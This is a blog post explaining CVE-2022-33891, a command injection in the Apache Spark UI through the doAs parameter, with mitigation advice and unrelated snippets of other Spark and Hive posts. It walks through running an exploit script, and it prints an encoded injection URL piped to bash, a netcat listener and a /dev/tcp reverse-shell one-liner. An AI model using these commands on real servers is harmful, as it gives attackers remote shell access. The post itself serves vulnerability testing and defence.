Skip to main content

CVE-2022-33891 Apache Spark Command Injection Vulnerability

 

Please refer - https://spark.apache.org/security.html


  • The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.
  • If an attacker is sending reverse shell commands using ?doAs. There is also a high chance of granting apache spark server access to the attackers’ machine.
Vulnerability description -

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.


Vulnerable component includes only Spark UI -
  • We tested Spark History Server, which worked fine when tested for vulnerability i.e. no Vulnerability
    • https://<SparkServer>:18081/
  • We tested Spark UI, starting Job using YARN master, which also worked fine for us i.e. no Vulnerability
    • https://<SparkServer>:8090/proxy/application_1684801301953_15767/
    • https://<SparkServer>:4043/
  • We tested Spark UI, starting Job with Local master, and it tested positive for Vulnerability i.e. we were able to do command line injection and execute shell commands on Spark server using remote machine.
    • https://<SparkServer>:4044/


  • Please create clone of above git repository.
  • Install python3 and following required libraries for the script - requests, argparse, colorama

  • Start Spark-Shell with --master local on one your machine in Hadoop Cluster. This will start Spark UI with web URL like -  https://<SparkServer>:4044/
  • Let’s check if this target (https://<SparkServer>:4044/) is vulnerable or not using below mentioned command - 
    • python3 exploit.py -u http://<Spark Server> -p 4044 --check --verbose
                  Note - Above command will append doAs paramter to URL and invoke same -  
      • http://<Spark Server>:4044/?doAs='testing'
      • http://<Spark Server>:4044/?doAs=`echo c2xlZXAgMTA=  | base64 -d | bash`
    • How this script verifies for Vulnerability is by calling above two URL's
      • The first URL invocation tells if URL supports ?doAs request parameter substitution.
      • If ?doAs is not supported then there can not be command line injection. Hence we are safe.
      • Second, it checks to see if we can execute "Sleep 10 " command on remote server. If it does sleep for 10 seconds means remote server is vulnerable else it is not.
  • Above command will tell you if above URL probably vulnerable or not.
  • Let’s use our exploit to get the reverse shell started to execute unix command on server from remote. But, before that start netcat listener to capture traffic for reverse shell using below mentioned command on some remote machine other then Spark Server. 
    • nc -nvlp 9002
  • Let's use  exploit command to start reverse shell.
    • python3 exploit.py -u http://<Spark Server> -p 4044 --revshell -lh <IP_OF_REMOTE_MACHINE_RUNNING_NETCAT> -lp 9002 --verbose
    • Above command Open's a interactive shell on Spark Server redirecting or lisntening to traffic from remote netcat machine. Ex: 
      • sh -i >& /dev/tcp/{IP_OF_REMOTE_MACHINE_RUNNING_NETCAT}/9002 0>&1
  • After this you should see Unix Shell on machine which was running netcat. On this machine you can execute you unix shell commands which will actually execute on remote Spark Server.
    • whoami
    • hostname

To mitigate the issue-
  • Cloudera Suggests to disable following properties (, if enabled)
    • spark.history.ui.acls.enable / spark.acls.enable
                        

Comments

Popular posts

Hive Parse JSON with Array Columns and Explode it in to Multiple rows.

 Say we have a JSON String like below -  { "billingCountry":"US" "orderItems":[       {          "itemId":1,          "product":"D1"       },   {          "itemId":2,          "product":"D2"       }    ] } And, our aim is to get output parsed like below -  itemId product 1 D1 2 D2   First, We can parse JSON as follows to get JSON String get_json_object(value, '$.orderItems.itemId') as itemId get_json_object(value, '$.orderItems.product') as product Second, Above will result String value like "[1,2]". We want to convert it to Array as follows - split(regexp_extract(get_json_object(value, '$.orderItems.itemId'),'^\\["(.*)\\"]$',1),'","') as itemId split(regexp_extract(get_json_object(value, '$.orderItems.product'),'^\\["(.*)\\"]$',1),...




org.apache.spark.sql.AnalysisException: Cannot overwrite a path that is also being read from.;

  Caused by: org.apache.spark.sql.AnalysisException: Cannot overwrite a path that is also being read from.; at org.apache.spark.sql.execution.command.DDLUtils$.verifyNotReadPath(ddl.scala:906) at org.apache.spark.sql.execution.datasources.DataSourceAnalysis$$anonfun$apply$1.applyOrElse(DataSourceStrategy.scala:192) at org.apache.spark.sql.execution.datasources.DataSourceAnalysis$$anonfun$apply$1.applyOrElse(DataSourceStrategy.scala:134) at org.apache.spark.sql.catalyst.trees.TreeNode$$anonfun$2.apply(TreeNode.scala:267) at org.apache.spark.sql.catalyst.trees.TreeNode$$anonfun$2.apply(TreeNode.scala:267) at org.apache.spark.sql.catalyst.trees.CurrentOrigin$.withOrigin(TreeNode.scala:70) at org.apache.spark.sql.catalyst.trees.TreeNode.transformDown(TreeNode.scala:266) at org.apache.spark.sql.catalyst.trees.TreeNode.transform(TreeNode.scala:256) at org.apache.spark.sql.execution.datasources.DataSourceAnalysis.apply(DataSourceStrategy.scala:134) at org.apache.spark.sql.execution.dataso...




Read from a hive table and write back to it using spark sql

In context to Spark 2.2 - if we read from an hive table and write to same, we get following exception- scala > dy . write . mode ( "overwrite" ). insertInto ( "incremental.test2" ) org . apache . spark . sql . AnalysisException : Cannot insert overwrite into table that is also being read from .; org . apache . spark . sql . AnalysisException : Cannot insert overwrite into table that is also being read from .; 1. This error means that our process is reading from same table and writing to same table. 2. Normally, this should work as process writes to directory .hiveStaging... 3. This error occurs in case of saveAsTable method, as it overwrites entire table instead of individual partitions. 4. This error should not occur with insertInto method, as it overwrites partitions not the table. 5. A reason why this happening is because Hive table has following Spark TBLProperties in its definition. This problem will solve for insertInto met...




Hadoop Distcp Error Duplicate files in input path

  One may face following error while copying data from one cluster to other, using Distcp  Command: hadoop distcp -i {src} {tgt} Error: org.apache.hadoop.toolsCopyListing$DulicateFileException: File would cause duplicates. Ideally there can't be same file names. So, what might be happening in your case is you trying to copy partitioned table from one cluster to other. And, 2 different named partitions have same file name. Your solution is to correct Source path  {src}  in your command, such that you provide path uptil partitioned sub directory, not the file. For ex - Refer below : /a/partcol=1/file1.txt /a/partcol=2/file1.txt If you use  {src}  as  "/a/*/*"  then you will get the error  "File would cause duplicates." But, if you use  {src}  as  "/a"  then you will not get error in copying.




Scala Spark building Jar leads java.lang.StackOverflowError

  Exception -  [Thread-3] ERROR scala_maven.ScalaCompileMojo - error: java.lang.StackOverflowError [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.generic.TraversableForwarder$class.isEmpty(TraversableForwarder.scala:36) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.mutable.ListBuffer.isEmpty(ListBuffer.scala:45) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.mutable.ListBuffer.toList(ListBuffer.scala:306) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.mutable.ListBuffer.result(ListBuffer.scala:300) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.mutable.Stack$StackBuilder.result(Stack.scala:31) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.mutable.Stack$StackBuilder.result(Stack.scala:27) [Thread-3] INFO scala_maven.ScalaCompileMojo - at scala.collection.generic.GenericCompanion.apply(GenericCompanion.scala:50) [Thread-3] INFO scala_maven.ScalaCompile...